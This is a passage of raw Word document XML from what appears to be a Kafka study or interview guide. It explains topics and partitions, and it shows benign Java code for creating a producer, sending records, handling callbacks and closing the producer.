      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2FB8F" w14:textId="77777777" w:rsidR="00D93542"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7234296">
          <v:rect id="_x0000_i3090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42697F08" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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Producer → Topic → Consumer Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B26D4" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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Producer         Topic (with partitions)         Consumer Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D7373" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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   ↓                        ↓                          ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252D3D9" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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send(data)  →  partition 0 | partition 1  →  Consumer 1 | Consumer 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E961A33" w14:textId="77777777" w:rsidR="00D93542"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EBE609D">
          <v:rect id="_x0000_i3091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7805B8" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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Advantages of Kafka’s Topic-Based Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8052F6" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>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Scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via partitions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB8F97" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>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Durable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (data stored on disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C08718" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>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Fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via replication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B8B7F" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>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Replayable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reprocess by reading from old offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC8D270" w14:textId="049F7609" w:rsidR="00D93542" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D9354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053A9A1">
          <v:rect id="_x0000_i3092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643BE65" w14:textId="7B7B4397" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="007C61B8" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="770" w:name="_Toc196308250"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka producer, and how does it send messages?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="770"/>
    </w:p>
    <w:p w14:paraId="76E08744" w14:textId="1AC66C8D" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a client application that </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sends data (records/messages)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB23264" w14:textId="77777777" w:rsidR="00C46ACA"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314ED65">
          <v:rect id="_x0000_i3093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3543F561" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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What is a Kafka Producer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2955EB" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1DD61" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>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Publishing messages to one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D26B73E" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>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Choosing the correct </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (either automatically or manually).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615099AB" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>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Serializing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the key and value into bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C240E49" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>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Handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acks</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retries</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44E634" w14:textId="77777777" w:rsidR="00C46ACA"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04E425F2">
          <v:rect id="_x0000_i3094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74403114" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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How Does a Kafka Producer Send Messages?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA7C473" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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Here’s the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>basic flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828571B" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>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Create Producer Properties:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You define configuration like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA26CCC" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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Properties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08347440" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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props.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C802F" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE691B" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10032F71" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>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Create a KafkaProducer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653FB4A0" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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KafkaProducer&lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58014F44" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>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Send Data to a Topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AC82F" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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ProducerRecord&lt;String, String&gt; record = new ProducerRecord&lt;&gt;("user-activity", "login");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE7CCD" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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producer.send(record);  // async</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836BA7C" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>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Optional) Add Callback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D041C" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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producer.send(record, (metadata, exception) -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B37093" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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    if (exception == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF29F67" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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        System.out.println("Message sent to topic " + metadata.topic() + " partition " + metadata.partition());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA10C1" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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    } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C189E4" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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        exception.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3B822" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084BD50F" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603958B8" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>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Flush and Close Producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D747F" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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producer.flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AE3F6" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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producer.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C481435" w14:textId="77777777" w:rsidR="00C46ACA"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F906624">
          <v:rect id="_x0000_i3095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C05CE" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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How Kafka Determines the Partition?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB76D6D" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>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If a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is provided → Kafka uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash(key) % numPartitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDD446" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>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If </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no key</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Kafka uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>round-robin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF56DEE" w14:textId="77777777" w:rsidR="00C46ACA"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1AB59E2">
          <v:rect id="_x0000_i3096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886F789" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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Example Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD325D2" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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Message sent to topic user-activity partition 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5EEE70" w14:textId="77777777" w:rsidR="00C46ACA"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5A3EEAB">
          <v:rect id="_x0000_i3097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE0FFD" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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Important Configur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7"/>
        <w:gridCol w:w="2723"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="5046771F" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EE81376" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
